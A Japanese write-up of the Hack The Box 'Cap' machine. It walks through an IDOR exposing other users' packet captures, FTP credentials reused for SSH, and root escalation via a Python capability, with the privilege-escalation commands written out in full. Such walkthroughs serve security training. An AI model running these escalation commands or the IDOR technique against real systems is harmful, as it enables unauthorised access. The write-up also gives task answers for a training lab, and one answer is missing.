Cap#
ip:10.10.10.245
Cap は、HTTP サーバーを実行する簡単な難易度の Linux マシンであり、このサーバーはネットワークキャプチャの実行を含む管理機能を実行します。不適切な制御により、安全でない直接オブジェクト参照(IDOR)が発生し、他のユーザーがキャプチャしたデータへのアクセスが得られます。このキャプチャには、足場を得るために使用できる平文の資格情報が含まれています。その後、Linux 機能を利用して root 権限に昇格します。
task1
いくつの TCP ポートが開いていますか?
3
task2
“Security Snapshot” を実行した後、ブラウザは/[something]/[id]
という形式のパスにリダイレクトされます。ここで、[id]
はスキャンされた ID 番号を表します。[something]
は何ですか?
task3 他のユーザーのスキャン結果を見ることができますか?
data の後の数字 id を変更することで、他のユーザーのスキャン結果を見ることができます。
task4 PCAP ファイルに含まれる機密データの ID は何ですか?
id は data の番号を指し、0 番の pcap ファイルには ftp ログインのアカウント情報があります。
task5 pcap ファイル内で、機密データはどのアプリケーション層プロトコルに現れますか?
ftp
task6 Nathan の FTP パスワードを取得しました。このパスワードは他のどのサービスで使用できますか?
ssh
task 7 nathan ユーザーのホームディレクトリにある flag を提出してください。
ssh nathan@10.10.10.245
ログイン後に flag が表示されます。
task8 root ディレクトリにある flag を提出してください。
suid ビットの設定を確認します。
find / -perm -u=s -type f 2>/dev/null
権限昇格スクリプト
https://github.com/carlospolop/PEAss-ng/tree/master/linPEAS
ターゲットマシン 10.10.10.245 にアップロードします。
python
参考:https://gtfobins.github.io/gtfobins/python/
cp $(which python) .
sudo setcap cap_setuid+ep python
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
/usr/bin/python3.8
import os
os.setuid(0)
os.system("/bin/bash")